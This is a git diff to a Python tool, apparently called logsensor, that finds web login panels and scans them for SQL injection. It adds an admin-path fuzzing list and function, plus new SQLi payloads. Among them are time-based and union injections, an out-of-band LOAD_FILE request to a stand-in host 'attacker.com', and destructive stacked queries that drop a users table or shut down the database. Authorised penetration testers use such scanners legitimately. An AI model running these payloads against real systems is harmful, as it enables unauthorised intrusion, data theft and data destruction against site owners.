diff --git a/logsensor.py b/logsensor.py index cb669a9..e0775fc 100644 --- a/logsensor.py +++ b/logsensor.py @@ -9,6 +9,15 @@ from src import logninputs, payloads, Errors from tabulate import tabulate +# Coomon paths to fuzz for +common_paths = [ + "admin", "login", "test", "backup", "passwords.txt", "admin.php", "admin.html", + "login.php", "login.html", "wp-login.php", "user", "dashboard", "cpanel", "panel", + "adm", "user.php", "user.html", "administrator", "db", "database", "phpmyadmin", + "pma", "config", "settings", "edit", "manage", "secure", "webadmin", "wp-admin", + "admin/login", "admin/login.php", "admin/login.html", "admin/index", "admin/index.php", + "admin/index.html" +] start = time.time() @@ -45,6 +54,10 @@ def ban(): parser.add_argument("-n","--inputname", help=" Customize actual username input for SQLi scan (default 'username' )") parser.add_argument("-t","--threads", help=" Number of threads (default 30)" ,type=int) parser.add_argument("-h", "--help", action="help", help="Show this help message and exit") +# Added options to Fuzz URLs before or after login panel detection checks +parser.add_argument("-fb","--fuzz-before", action='store_true', help="Fuzz URLs before other checks") +parser.add_argument("-fa","--fuzz-after", action='store_true', help="Fuzz URLs after successful login panel detection") + args = parser.parse_args() if len(sys.argv) == 1: ban() @@ -79,6 +92,10 @@ class main(): def __init__(self,lines): self.lines = lines try: + # Fuzz URLs before other checks if --fuzz-before was specified + if args.fuzz_before: + self.fuzz_before() + req = requests.get(lines, headers=useragent, proxies=proxies, verify=False, timeout=8,allow_redirects=True) response = str(req.content) soup = BeautifulSoup(response, "html.parser") @@ -102,6 +119,9 @@ def __init__(self,lines): if find != None: loginurls.append(req.url +str(action)) print(colored("[+] Login panel found ! [{}] - {}","green").format(req.url, req.status_code)) + # Fuzz URLs after successful login panel detection if --fuzz-after was specified + if args.fuzz_after: + fuzz_urls(req.url +str(action)) break else: pass @@ -132,6 +152,7 @@ def getresults(): msgpyld = colored("[+]","green",attrs=["bold"])+" Payload: " msgerr = colored("[+]","green",attrs=["bold"])+ " Detected error: " msgreg = colored("[+]","green",attrs=["bold"])+" Regex Used: " + def inject(loginurls, inputname): print(colored("[@] Start POST Form SQLi Scanning [@]","cyan")) try: @@ -190,6 +211,15 @@ def inject(loginurls, inputname): print("\nStopped") exit(0) +# Added a fucntion to Fuzz the different URLS +def fuzz_urls(base_url): + for path in common_paths: + url = base_url + "/" + path + response = requests.get(url) + if response.status_code == 200: + print("Potential hidden resource found at: " + url) + + if __name__ == '__main__': def sensorWithThreads(): try: diff --git a/src.py b/src.py index 7e3bce6..97953d9 100644 --- a/src.py +++ b/src.py @@ -10,7 +10,7 @@ '[Ll]og [Ii]n'] - +# Added extra payloads to test Boolean and Time Based blind SQLi, also added some checks for Union Based, Error based, Out of Bound, Stack queries SQLi's payloads = ["' or ''-'", "admin' or '1'='1", "' UNION ALL SELECT 1", @@ -20,7 +20,21 @@ "admin' and substring(password/text(),1,1)='7", "' and substring(password/text(),1,1)='7", "' or 1=1 limit 1 -- -+", - "'=or'"] + "'=or'", + "' OR 'a'='a", + "' OR 'a'='b", + "' OR 1=1 --", + "' OR 1=2 --", + "' OR SLEEP(5) AND '1'='1", + "' OR SLEEP(5) AND '1'='2", + "' UNION SELECT 1,2,3,4,5 --", + "' UNION SELECT NULL,NULL,NULL --", + "' OR SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x7e,0x27,CAST(database() AS CHAR),0x27,0x7e)) FROM `information_schema`.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM `information_schema`.tables GROUP BY x)a --", + "' OR (SELECT 1 FROM (SELECT SLEEP(25))A) --", + "' OR (SELECT LOAD_FILE('\\\\attacker.com\\test.txt')) --", + "'; DROP TABLE users; --", + "'; SHUTDOWN; --"] + # Regex from Ekultek (https://github.com/Ekultek/Zeus-Scanner/blob/master/lib/core/settings.py) with some edits